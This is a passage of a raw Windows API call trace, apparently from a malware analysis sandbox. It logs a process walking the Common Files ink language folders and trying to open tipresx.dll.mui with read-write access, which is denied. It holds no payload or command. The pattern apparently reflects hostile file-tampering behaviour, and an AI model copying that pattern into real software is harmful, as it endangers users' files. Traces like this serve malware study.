(HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0085.048] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0085.048] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0085.048] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x80a30 [0085.048] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0085.048] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0085.048] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x50cf8 [0085.049] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0085.049] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.049] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.049] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.049] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.049] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x50cf8 | out: hHeap=0x20000) returned 1 [0085.049] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0085.049] AreFileApisANSI () returned 1 [0085.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0085.049] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d9a0 [0085.049] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.049] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.049] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0085.049] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0085.049] AreFileApisANSI () returned 1 [0085.049] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d9a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0085.049] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85e40 [0085.049] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d9a0, cbMultiByte=-1, lpWideCharStr=0x85e40, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\tipresx.dll.mui") returned 73 [0085.049] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lt-lt\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x334 [0085.405] GetFileType (hFile=0x334) returned 0x1 [0085.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85e40 | out: hHeap=0x20000) returned 1 [0085.406] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0085.406] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0085.406] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0085.406] CloseHandle (hObject=0x334) returned 1 [0085.406] AreFileApisANSI () returned 1 [0085.406] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d9a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0085.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85940 [0085.406] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d9a0, cbMultiByte=-1, lpWideCharStr=0x85940, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\tipresx.dll.mui") returned 73 [0085.406] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lt-lt\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.406] GetLastError () returned 0x5 [0085.406] GetLastError () returned 0x5 [0085.406] SetLastError (dwErrCode=0x5) [0085.406] GetLastError () returned 0x5 [0085.407] SetLastError (dwErrCode=0x5) [0085.407] GetLastError () returned 0x5 [0085.407] SetLastError (dwErrCode=0x5) [0085.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85940 | out: hHeap=0x20000) returned 1 [0085.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0085.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0085.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d9a0 | out: hHeap=0x20000) returned 1 [0085.407] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.407] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.407] FindNextFileW (in: hFindFile=0x78c50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x50d00, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓⠀")) returned 0 [0085.407] FindClose (in: hFindFile=0x78c50 | out: hFindFile=0x78c50) returned 1 [0085.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0085.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0085.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0085.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0085.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e3e8 | out: hHeap=0x20000) returned 1 [0085.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0085.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0085.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0085.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46b38 | out: hHeap=0x20000) returned 1 [0085.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0085.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0085.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0085.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0085.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0085.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60138 [0085.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0085.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ec68 [0085.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60138 | out: hHeap=0x20000) returned 1 [0085.408] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.408] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.408] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.408] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ec68 | out: hHeap=0x20000) returned 1 [0085.408] AreFileApisANSI () returned 1 [0085.408] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV", lpUsedDefaultChar=0x0) returned 57 [0085.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0085.408] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.408] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0085.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0085.408] AreFileApisANSI () returned 1 [0085.408] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0085.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69bb0 [0085.408] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV") returned 57 [0085.408] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lv-lv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.408] GetLastError () returned 0x5 [0085.408] GetLastError () returned 0x5 [0085.408] SetLastError (dwErrCode=0x5) [0085.408] GetLastError () returned 0x5 [0085.408] SetLastError (dwErrCode=0x5) [0085.408] GetLastError () returned 0x5 [0085.409] SetLastError (dwErrCode=0x5) [0085.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0085.409] AreFileApisANSI () returned 1 [0085.409] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0085.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69bb0 [0085.409] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV") returned 57 [0085.409] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lv-lv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.409] GetLastError () returned 0x5 [0085.409] GetLastError () returned 0x5 [0085.409] SetLastError (dwErrCode=0x5) [0085.409] GetLastError () returned 0x5 [0085.409] SetLastError (dwErrCode=0x5) [0085.409] GetLastError () returned 0x5 [0085.409] SetLastError (dwErrCode=0x5) [0085.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0085.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0085.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0085.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0085.409] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.409] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.409] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.409] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0085.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fe78 [0085.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0085.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0085.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fe78 | out: hHeap=0x20000) returned 1 [0085.409] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a4376e, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd1f30e81, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd1f30e81, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x19f200, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="micaut.dll", cAlternateFileName="")) returned 1 [0085.410] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0085.410] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0085.410] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0085.410] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0085.410] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0085.410] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0085.410] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0085.410] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0085.410] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0085.410] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.410] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0085.410] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0085.410] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78c50 [0085.410] FindNextFileW (in: hFindFile=0x78c50, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076ba6e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.410] FindNextFileW (in: hFindFile=0x78c50, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e933091, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e933091, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e933091, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0085.410] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0085.410] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0085.410] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0085.410] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0085.410] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0085.410] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0085.410] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0085.410] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0085.410] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0085.410] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0085.410] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0085.410] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46278 [0085.410] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0085.410] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0085.410] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0085.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0085.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0085.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0085.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0085.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0085.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0085.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0085.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e7a0 [0085.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0085.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x51590 [0085.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e7a0 | out: hHeap=0x20000) returned 1 [0085.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0085.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x50cf8 [0085.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51590 | out: hHeap=0x20000) returned 1 [0085.411] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.411] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.411] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.411] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x50cf8 | out: hHeap=0x20000) returned 1 [0085.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0085.411] AreFileApisANSI () returned 1 [0085.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0085.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d9a0 [0085.411] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.411] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0085.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0085.411] AreFileApisANSI () returned 1 [0085.411] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d9a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0085.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x854e0 [0085.411] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d9a0, cbMultiByte=-1, lpWideCharStr=0x854e0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\tipresx.dll.mui") returned 73 [0085.412] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lv-lv\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x334 [0085.412] GetFileType (hFile=0x334) returned 0x1 [0085.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x854e0 | out: hHeap=0x20000) returned 1 [0085.412] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0085.412] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0085.412] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0085.412] CloseHandle (hObject=0x334) returned 1 [0085.413] AreFileApisANSI () returned 1 [0085.413] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d9a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0085.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85c60 [0085.413] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d9a0, cbMultiByte=-1, lpWideCharStr=0x85c60, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\tipresx.dll.mui") returned 73 [0085.413] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lv-lv\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 